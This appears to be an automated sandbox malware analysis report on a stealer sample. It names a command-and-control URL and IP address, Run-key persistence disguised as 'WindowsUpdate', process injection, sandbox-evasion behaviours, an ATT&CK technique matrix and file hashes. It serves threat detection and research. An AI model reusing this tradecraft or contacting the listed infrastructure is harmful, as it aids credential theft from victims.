                Source: qwlvpmrupf.mp3Binary or memory string: WIN_VISTA
                Source: qwlvpmrupf.mp3Binary or memory string: WIN_7
                Source: qwlvpmrupf.mp3Binary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0000000E.00000002.1935619525.00000000060B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2946403129.0000000005A41000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.2208992211.00000000062C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000003.1961307501.0000000005639000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2068593152.00000000066C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.2287549394.0000000005FC3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000003.1932421408.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003F2163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,7_2_003F2163
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003F1B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,7_2_003F1B61
                Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 15_2_05A49B4B socket,WSAGetLastError,SetHandleInformation,GetLastError,closesocket,bind,WSAGetLastError,15_2_05A49B4B
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00E12163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,16_2_00E12163
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00E11B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,16_2_00E11B61
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                2
                Valid Accounts
                11
                Windows Management Instrumentation
                1
                Scripting
                1
                Exploitation for Privilege Escalation
                11
                Disable or Modify Tools
                41
                Input Capture
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts12
                Native API
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                1
                Deobfuscate/Decode Files or Information
                LSASS Memory1
                Account Discovery
                Remote Desktop Protocol41
                Input Capture
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts2
                Command and Scripting Interpreter
                2
                Valid Accounts
                2
                Valid Accounts
                2
                Obfuscated Files or Information
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares3
                Clipboard Data
                1
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron1
                Registry Run Keys / Startup Folder
                21
                Access Token Manipulation
                1
                Software Packing
                NTDS138
                System Information Discovery
                Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script312
                Process Injection
                1
                DLL Side-Loading
                LSA Secrets351
                Security Software Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                Registry Run Keys / Startup Folder
                11
                Masquerading
                Cached Domain Credentials131
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Valid Accounts
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job131
                Virtualization/Sandbox Evasion
                Proc Filesystem1
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Access Token Manipulation
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron312
                Process Injection
                Network Sniffing1
                System Network Configuration Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1560167 Sample: ngPebbPhbp.exe Startdate: 21/11/2024 Architecture: WINDOWS Score: 100 72 Multi AV Scanner detection for submitted file 2->72 74 Yara detected Autoit Injector 2->74 76 Yara detected RHADAMANTHYS Stealer 2->76 78 9 other signatures 2->78 10 ngPebbPhbp.exe 3 29 2->10         started        14 qwlvpmrupf.mp3.exe 1 2 2->14         started        16 qwlvpmrupf.mp3.exe 2->16         started        18 qwlvpmrupf.mp3.exe 2->18         started        process3 file4 64 C:\Users\user\AppData\...\qwlvpmrupf.mp3, PE32 10->64 dropped 66 C:\Users\user\AppData\Local\Temp\...\rmxb.vbe, Unicode 10->66 dropped 94 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->94 20 wscript.exe 1 10->20         started        68 C:\Users\user\...\qwlvpmrupf.mp3.exe.exe, PE32 14->68 dropped 96 Found API chain indicative of sandbox detection 14->96 98 Writes to foreign memory regions 14->98 100 Allocates memory in foreign processes 14->100 23 RegSvcs.exe 14->23         started        102 Injects a PE file into a foreign processes 16->102 25 RegSvcs.exe 16->25         started        27 RegSvcs.exe 18->27         started        signatures5 process6 signatures7 80 Windows Scripting host queries suspicious COM object (likely to drop second stage) 20->80 29 cmd.exe 1 20->29         started        31 cmd.exe 1 20->31         started        34 cmd.exe 1 20->34         started        process8 signatures9 36 qwlvpmrupf.mp3 1 27 29->36         started        40 conhost.exe 29->40         started        104 Uses ipconfig to lookup or modify the Windows network settings 31->104 42 conhost.exe 31->42         started        44 ipconfig.exe 1 31->44         started        46 conhost.exe 34->46         started        48 ipconfig.exe 1 34->48         started        process10 file11 56 C:\Users\user\AppData\...\qwlvpmrupf.mp3.exe, PE32 36->56 dropped 58 C:\Users\user\AppData\...\qwlvpmrupf.mp3.exe, PE32 36->58 dropped 60 C:\Users\user\AppData\...\qwlvpmrupf.mp3, PE32 36->60 dropped 62 C:\Users\user\AppData\Local\...\RegSvcs.exe, PE32 36->62 dropped 82 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 36->82 84 Writes to foreign memory regions 36->84 86 Allocates memory in foreign processes 36->86 88 Injects a PE file into a foreign processes 36->88 50 RegSvcs.exe 1 1 36->50         started        signatures12 process13 process14 52 OpenWith.exe 50->52         started        dnsIp15 70 51.75.171.9, 49736, 49737, 49738 OVHFR France 52->70 90 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 52->90 92 Switches to a custom stack to bypass stack traces 52->92 signatures16

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                ngPebbPhbp.exe55%ReversingLabsWin32.Trojan.Generic
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp30%ReversingLabs
                C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3.exe0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\RegSvcs.exe0%ReversingLabs
                C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp30%ReversingLabs
                C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe0%ReversingLabs
                C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe.exe0%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://51.75.171.9:5151/9640d96bbead45f349f3ab9/nvkjh5gq.0x2e8(0%Avira URL Cloudsafe
                https://51.75.171.9:5151/9640d96bbead45f349f3ab9/nvkjh5gq.0x2e80%Avira URL Cloudsafe
                No contacted domains info
                NameSourceMaliciousAntivirus DetectionReputation
                http://www.autoitscript.com/autoit3/JngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2078930988.0000000000E65000.00000002.00000001.01000000.0000000E.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2216834063.0000000000E65000.00000002.00000001.01000000.0000000E.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000000.2185326660.0000000000E65000.00000002.00000001.01000000.0000000E.sdmpfalse
                  high
                  https://www.autoitscript.com/autoit3/ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://51.75.171.9:5151/9640d96bbead45f349f3ab9/nvkjh5gq.0x2e8(OpenWith.exe, 0000000F.00000002.2944848789.000000000327C000.00000004.00000010.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://51.75.171.9:5151/9640d96bbead45f349f3ab9/nvkjh5gq.0x2e8OpenWith.exe, 0000000F.00000002.2944848789.000000000327C000.00000004.00000010.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    51.75.171.9
                    unknownFrance
                    16276OVHFRfalse
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1560167
                    Start date and time:2024-11-21 13:44:05 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 10m 44s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:23
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:ngPebbPhbp.exe
                    renamed because original name is a hash value
                    Original Sample Name:5f58e87fee021cbaa9ecfae2d5f8709bd0934b2d2d2779a8f24993425fb20350.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@31/48@0/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 90%
                    • Number of executed functions: 179
                    • Number of non-executed functions: 218
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report creation exceeded maximum time and may have missing disassembly code information.
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.
                    • VT rate limit hit for: ngPebbPhbp.exe
                    TimeTypeDescription
                    07:45:13API Interceptor1x Sleep call for process: ngPebbPhbp.exe modified
                    12:45:17AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3
                    12:45:30AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3
                    12:45:39AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    51.75.171.9dDEjicKkUS.exeGet hashmaliciousRHADAMANTHYSBrowse
                      Xteam30.htaGet hashmaliciousRHADAMANTHYSBrowse
                        O239SIeyKA.exeGet hashmaliciousRHADAMANTHYSBrowse
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          OVHFRhttps://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.comGet hashmaliciousUnknownBrowse
                          • 213.186.33.5
                          https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.comGet hashmaliciousUnknownBrowse
                          • 213.186.33.5
                          Demande de proposition du Fondation qu#U00e9b#U00e9coise du cancer.pdfGet hashmaliciousUnknownBrowse
                          • 66.70.227.242
                          AI_ChainedPackageFile.VistaSoftware.exeGet hashmaliciousPureCrypterBrowse
                          • 167.114.47.186
                          AaronGiles(1).exeGet hashmaliciousPureCrypterBrowse
                          • 167.114.47.186
                          740d3a.msiGet hashmaliciousUnknownBrowse
                          • 167.114.47.186
                          AI_ChainedPackageFile.VistaSoftware.exeGet hashmaliciousPureCrypterBrowse
                          • 167.114.47.186
                          Reminder.exeGet hashmaliciousPureCrypterBrowse
                          • 167.114.47.186
                          KEFttAEb.vbsGet hashmaliciousPureCrypterBrowse
                          • 167.114.47.186
                          AaronGiles(1).exeGet hashmaliciousPureCrypterBrowse
                          • 167.114.47.186
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3FS04dlvJrq.exeGet hashmaliciousFormBookBrowse
                            M1Y6kc9FpE.exeGet hashmaliciousFormBookBrowse
                              mJIvCBk5vF.exeGet hashmaliciousFormBookBrowse
                                lcbF0sywlU.exeGet hashmaliciousFormBookBrowse
                                  1aG5DoOsAW.exeGet hashmaliciousFormBookBrowse
                                    Factura-2410-CFDI.batGet hashmaliciousUnknownBrowse
                                      DGFmCcZnM0.exeGet hashmaliciousFormBookBrowse
                                        qZkywW6Q0b.exeGet hashmaliciousFormBookBrowse
                                          AlBXxWizEX.msiGet hashmaliciousDanaBotBrowse
                                            mEudzoO1bG.exeGet hashmaliciousFormBookBrowse
                                              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):315
                                              Entropy (8bit):5.372464481033641
                                              Encrypted:false
                                              SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTa73FKDLIP12MUAvvrs:Q3La/KDLI4MWuPTAq1KDLI4M6
                                              MD5:EBC4CD5E62FD6AA60583F3FF6A9FF095
                                              SHA1:78DD536884E05E07063D5A0089D8171A50526610
                                              SHA-256:CFC0C86537AD3B643ACDFE5B20D4A87218C0BBB5319237A8BFA7954A46E07F00
                                              SHA-512:3C83D639937CB947942B90D1EBEAD437F942E35741656D70897A7DF0CF61B68CF7F3CFB38A890F14FB774B87ACAD0C3CA8322E705C30E1C585AC7797072A7C7B
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):508
                                              Entropy (8bit):5.479727752033359
                                              Encrypted:false
                                              SSDEEP:6:8RrGdDpW9J7mwnTXTJ+VmSgRTcG7VA+UCduyBrgWDgRi8Ty8Mu2C/B2azVWmUOQ8:Aq/SRLTmgZ7VzwODJPlCbUOQH8raBPc
                                              MD5:D391F8B614A342CFF9FCBF8F4E41C934
                                              SHA1:FC045F44973B9000F63808ABD1E59C66ED6755B7
                                              SHA-256:36568784A413D46056FAC31E259C41F4429F08B1564A72CEB777CC80A0AA9F1C
                                              SHA-512:E446D6F17E9765AC260F4BD429FFE901C47C46FDFDEFBA25269A33E570E98B24469B529B815322E1D17AE3B4589ECF5561519D39D3AD65FD164AA8FCA50E62AD
                                              Malicious:false
                                              Preview:13Q6zh847S45g6A2cH4mv6Q5W144vY6AH5972d938UTIk14EI5eC1H550y7Cq0TRD695T643diC189ozNoeMqD..ComboConstants ButtonConstants..n6812ly6QM661R2U13FDXSNeD1jFG4iHq7Y5m11P8Db0mX7i2ven5Jon68h1352y93b5NS4r9g888993..BorderConstants ComboConstants..458354d8u104IpZoH294M7s4Z0DZtF926l050IX5avG2A1393kp7Y061DD02T..FileConstants FileConstants..6q4s927yPeasW75NX2gP090wT809FH21p95sDCV794v13oNY1g2p37wUi33c6r3alyp9KL1e505x1a6P6Z57R9K2395..BorderConstants UpDownConstants..5zN094t11829G6o89k..ToolbarConstants TreeViewConstants..
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):624
                                              Entropy (8bit):5.578995690653875
                                              Encrypted:false
                                              SSDEEP:6:px8jxX+dkaEJNur4UiHGVI8o/KU0L6cW2N/Aykx4SVc9m5CQFXiKUn0Htwdl7h4c:qxudC+CGVI5/KUbR2N/A75CQJjrNCgWd
                                              MD5:C3A02FE4F358078606A02B7D8C069957
                                              SHA1:4CB6FC80AC829FCDB8088CC95F6C109C719CFA5D
                                              SHA-256:D8ABE1326E449CA4D9C330A900CE393EE32101793D91E7F556D0C87E77ADBA0C
                                              SHA-512:C016DED65E5A728E3EFF1E66AE913FF81677B197B4C809A9F9E509304DC2747A581597760B0D4B79E60C03647DC3569CAE21C413152C6E4AF8B4DEDE10E8BB9D
                                              Malicious:false
                                              Preview:834DOh7Je661F2c5x2Ow20Ja7vU6NFcv5O02Ac2g0I27x85247oNwN2Zi6qTh913b97CO8B45CTs2f6P9Jl55NY2Zk7P4198N0K72908qD93JeQY9n3KRM9fI868cBg24c37a2w9..ToolTipConstants BorderConstants..9n7i1Z394y14OPSW5z977v19g556Ma3788W72Tl033r8Kc2g2csp145u9b4F1d802Vi1K5XaE6..ColorConstants StructureConstants..8362kXs3l3Kr9a6pxh7DV33..BorderConstants ComboConstants..LTz071752Mo7Q622F9jiN505B91QV82i5ZM1nQI4ThM10Kp33sQKfaS981S03NI2T404E5s4x02A1sR7ND4RW3A04vr7BJgl656706yg..ColorConstants ToolTipConstants..jb1ii7Kqv193B38S1Wq1R69h75b249507B84260hB8RocdDQh7590K1Uk0x1yj2o21Yw9c6jp4196lPD3ZdB1i75w00dGmZUhsWKnO50N70TL0..FileConstants DateTimeConstants..
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):528
                                              Entropy (8bit):5.506196921189518
                                              Encrypted:false
                                              SSDEEP:12:Df7UTwPck1UAJeu31tWxpeo2plPx2CnDcJjojWd9E:DfArk1UAIuFAI5vzr
                                              MD5:83CA8D8BAC38AF12453F9D9FF1D02916
                                              SHA1:DCC6E7AB9858EB9FF63F4CD2DD7E9B84EC694A22
                                              SHA-256:58412D427987A11C362FC7D921804F58277C3A5E4EA7CE98D4DC260E9AEB6302
                                              SHA-512:1BF89F1196B9C41E5781F118CE657AEC2194D48B0C4D15672A55093778C660E609626A9E5EA5336064590A9BD21F8FA1D9CF6F6435E866A0FACF50E438D5D3F0
                                              Malicious:false
                                              Preview:82JG78W49Z6rBhKeP0LfTp7Xg28VhFf1aX0x6U070h1vC5j0r92Mi7..TreeViewConstants ColorConstants..z1SEK6fEtUM9F8cG9454759C0O4w2ypt1Bb28qtf5dFm0xi230wVx34u87fLZ00..ButtonConstants DateTimeConstants..817kA2766727tzg7f17Sa1..BorderConstants ToolbarConstants..j9A6k74SGiH01aU7N3U2..ColorConstants GuiDateTimePicker..SzR70D8525Q9257Q2U49Z7P2QW929HN1tQ99j8W400524C26OKd870rIAA0SAz16c803..BorderConstants ColorConstants..es923584X949Y6Uc07114kQ4U9aVC8FdE208gU7E7X2b5m0F047i69SUX793Fmj038bp52boo6070BLW1j5987I..DateTimeConstants FileConstants..
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):532
                                              Entropy (8bit):5.614408649531123
                                              Encrypted:false
                                              SSDEEP:12:RV3ATUo9lbTfylFQkoQPvXXaBPx/EB+CGVRsXoGo0ciVI:6FgVPPqTSkaoRj
                                              MD5:8344337D8607EEF8BA26FC751F8E0122
                                              SHA1:2AB2AFCE50E3553637AEC0B5A65AA2E72D0CE51A
                                              SHA-256:ECB2D582D697D033A5E5BD06387DF5725AF74707C0E4B596D564BE2BDB1221A7
                                              SHA-512:DA3CAB35922C97D3D03C073F51915792278919775C9690AD95A8BD7143CD45A5B0FCBB5216ED53DFC3EEE1265BB91DDCDD875699AB23B3D95FCCC991190CAF2B
                                              Malicious:false
                                              Preview:V31181L127945gJ1Uws83220u59cr2f5dSML361TJdCh3lS6Wh34497f07h20652z7N867yP02D068ASQ537P97O834tRqR3X55368IUP233E78g4Cdj86r1y31kNuM1209o00aA3D340Sk8VFE2ezk338jo8021AB2UjCm2p5..TreeViewConstants ToolTipConstants..1id391JT5g3Rpna5g2p2OW4495v3G312zf5d8Ov157464n01cn1T598s2JXMoG3x46r0aJMP4eKnM66..GuiDateTimePicker ToolTipConstants..0K7884RIuoz0898H2I9P3V22r7V048De5H47M6eG3AaI5r8R3BuqXj7Zm5zlNq56eC6Y893A83e0mW6JM01W9w2ZcuDjbO8548qpM85y3Dj92QNzT5GAM3Qdj1T1SiS19qB3k37Z0g0v849w4sK82br5V629b2y5A290v63O1q0h..UpDownConstants UpDownConstants..
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):609
                                              Entropy (8bit):5.593001882864648
                                              Encrypted:false
                                              SSDEEP:12:zMySb9uAA0s7OThyH8QiRiYSDwHNGDJnwLo5Q0VynLv:At9uX0s7OtOxwHNcJwx0V0b
                                              MD5:73CDC398766B26D5B3FC2A732B633E80
                                              SHA1:4E8178167362C791D19B8DD90284751E6294C041
                                              SHA-256:D078345688738BC731EE73004AC6AD2670CFD6343B570FA5B7C0AB7AD30F0B48
                                              SHA-512:AB55CECF628450EE0E07591C8A6B7E1EBD6F1E1FF0C3184A14BF297C64153C8507B331A391020A5068D7C23CB55E73125E7582D204CE6F5C1E26F3EE3CD32705
                                              Malicious:false
                                              Preview:3li0Xn8t8B6x42r4GbotIM1C1yN0dew5wV9653qpJmgzHW31n4u75RwF0qJPo51l0zyo7ayqW365qsyy00UWUD0mn48038gP14kT9JNM72656Hiv3d5243B5thSNh45FXT82wo37B1r77Ty3m0354RZI71Jio01ZxyUlF582x6889t76NN7R74YD..FileConstants ComboConstants..5I641lHUk1155oKBDOSFb2cZ011r365L898vayymH47s2wZ083U25oF8X3227zT28y4V8JVILGUH31t024129nX5f5mMo4l04jJ5F39p63X0JlfbXut9..ComboConstants ColorConstants..5ZC2164T791T238XuQ4h0..ButtonConstants ToolbarConstants..TNfhG54lK22bJQSg20foWy2Xqo76K5b7932RRN3i8rK2KEl4j576w706v0sLAr6984Of40XjH5nI0Z29l8C7h5b89b613e4rFzwf014u0285impoH34vX335U92KFxCx097k2x6O576rcz73NP63cB..DateTimeConstants UpDownConstants..
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):522
                                              Entropy (8bit):5.512682217978687
                                              Encrypted:false
                                              SSDEEP:12:aaf22j3HmimBHSZxVelxyBt7hYNyWcXGbZ3cwRr:A2LhmBexcfStQyBor
                                              MD5:25B3D4F1279923FD4780981605BCE9FB
                                              SHA1:12257BD64A5AB12EAFD4679BDBDF9BCF2903B160
                                              SHA-256:DF4F76D702170095FA752D69F1AB793604E9DCCE7ADCAD7C83FDAE623F0C0093
                                              SHA-512:F3579A94EBABD59B055D7170E3F9FBAEC7D645E3CBE0EFF514413621FEC6811FB07264E4A5048222E8A84BDEB671D7580989B7E2D6B8987795782B4C7C7E9920
                                              Malicious:false
                                              Preview:49pWmAv4tOE436P02w6j841y8m4123W4P531ae6TkIK96G0t5T5m1487lyGEt9U56cnk01T7Dgm3Xs53PK3i571cI606b3o719B..FontConstants ToolbarConstants..690v95P8h87W7PV1u0p8ZKv25l5652Rv1T23ac8341Bz08A4K993a0NO2I2x72m22t1jsXMMVz25olS10260A709K8D347VY0iCC1c8A863H3K6U91m4oH3tfKlz3Pm1o63..FileConstants ColorConstants..Tts32nk..ToolbarConstants FileConstants..gA1qgpj4F9r8Qx72ZjiS3R88GD1v2089pQZ838Xwf7e2A1ZNE2q841NrN3o71q89NYj5w26F92E23KW5a773o4cCln6R912E32262lr47T6U83u703677039Ckd0YR8zek886aze1hgmm2qL76OuA2O61..FileConstants ComboConstants..
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):586
                                              Entropy (8bit):5.585544499923843
                                              Encrypted:false
                                              SSDEEP:12:SCsCEhjB3FzAduE13Ozk0L4d3VNXINdzzPXbWWC6pZBPc:7sCwjB3addBOQgSFNXUeWCUZO
                                              MD5:AC53EE172CC20F1BC979FD4710CBFA00
                                              SHA1:5C83524E42270883FF05C434F3AB62ADA8931F51
                                              SHA-256:774C4CC458E33020B29FA28FC91DB540C86F55142D716CA1613DA20670435198
                                              SHA-512:70DF2BFE2300AAE5BEC804E7F0235C1B9601FC1447DF84248B6EFF030A4F36B908D00D089911D082C7CA10F7F9D30239B1414B754B32CB1ADC8F8A5A7286341D
                                              Malicious:false
                                              Preview:2KnAS42t0717CtE86wxw1eBx6M9m00LhKgjL7bTv87b697..ComboConstants FileConstants..8P338lYn1Lz17O1D1m17ZDA76b61qv0r28HOQr81eq944h4r5YGvr1zd61csiM931f388i2IVdp90HFXW3ey05ttx8zd01l619Yo4pw7yYC76u25908Kq314r0jCE0fi4g8CS3u6OQIc0LN38983kx68kadwbRxr7I583x4PN532O..ComboConstants ButtonConstants..4l527imF4dR4CpFQ4uanrzi94h447ild095turzb786nr57N5T6SQ1n49lU2847ncDSW982Ze9w44X81F2fN6E9M483aQOx4t81N1plRMm4XI95..DateTimeConstants FileConstants..IUnPzxKt9I79R82mLPBf..ToolTipConstants DateTimeConstants..2w611G817F9vxhnVW19MGSBi4S1K8e7bo70h8eRFN17V22AV0Mc4195r928F2o..FontConstants TreeViewConstants..
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):588
                                              Entropy (8bit):5.744612228806984
                                              Encrypted:false
                                              SSDEEP:12:WnGNeRd/MUAwEhQmHIFFg33etq6gFodFgSRRhkbkNkt7HLzYmv:WGuNW3F6gKdbRhkANo7LFv
                                              MD5:62A55B40D10BC4CCDF643E624B90D003
                                              SHA1:1AAFD527E1B40B555B1E68E1F6D9F6C594586913
                                              SHA-256:9401C3D0CBD1FBB5FB740EA9EFF7B4F7AF764574A6CBC487C97F99F610BA9852
